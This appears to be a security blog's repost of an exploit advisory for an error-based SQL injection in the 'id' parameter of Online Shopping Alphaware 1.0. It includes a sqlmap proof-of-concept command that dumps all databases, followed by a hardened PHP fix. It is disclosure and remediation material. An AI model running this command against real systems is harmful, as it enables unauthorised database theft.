Friday, April 19, 2024

Online Shopping Alphaware 1.0 – Error Based SQL injection

# Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection
# Exploit Author: Moaaz Taha (0xStorm)
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
# Description
The "id" parameter in the path "/alphaware/details.php?id=431860" is vulnerable to Error-Based blind SQL injection, which allows retrieval of all databases.

# POC
sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10
            

Date: 2020-12-01

CVE: N/A

Platform: PHP
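
One way to handle the `id` parameter safely, as an added example (not the vendor's code or the exploit author's). It assumes PHP 8 with mysqli and mysqlnd; the database, table, column and account names are hypothetical.

```php
<?php
// Added example: hardened lookup for details.php?id=...
// Hypothetical names: database "alphaware", table "product", its columns,
// and the "app_readonly" account with a placeholder password.
declare(strict_types=1);

// Error-based injection needs database error text in the response,
// so errors are written to the server log and never displayed.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function parse_product_id(mixed $raw): ?int
{
    // Accept only a positive decimal integer; arrays, strings with SQL, etc. fail.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function find_product(mysqli $db, int $id): ?array
{
    // The id is bound as an integer parameter, never concatenated into the SQL.
    $stmt = $db->prepare(
        'SELECT product_id, product_name FROM product WHERE product_id = ?'
    );
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

$id = parse_product_id($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);
    exit('Invalid product id.');
}

try {
    // A read-only account limits what any remaining query flaw can reach.
    $db = new mysqli('127.0.0.1', 'app_readonly', 'CHANGE_ME', 'alphaware');
    $db->set_charset('utf8mb4');
    $product = find_product($db, $id);
} catch (mysqli_sql_exception $e) {
    error_log('details.php query failed: ' . $e->getMessage());
    http_response_code(500);
    exit('Something went wrong.'); // generic message, no SQL error details
}

echo $product === null
    ? 'Product not found.'
    : htmlspecialchars($product['product_name'], ENT_QUOTES, 'UTF-8');
```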

RiSec.Mitch
Just your average information security researcher from Delaware US.

more infosec reads

Subscribe for weekly updates

explore

more

security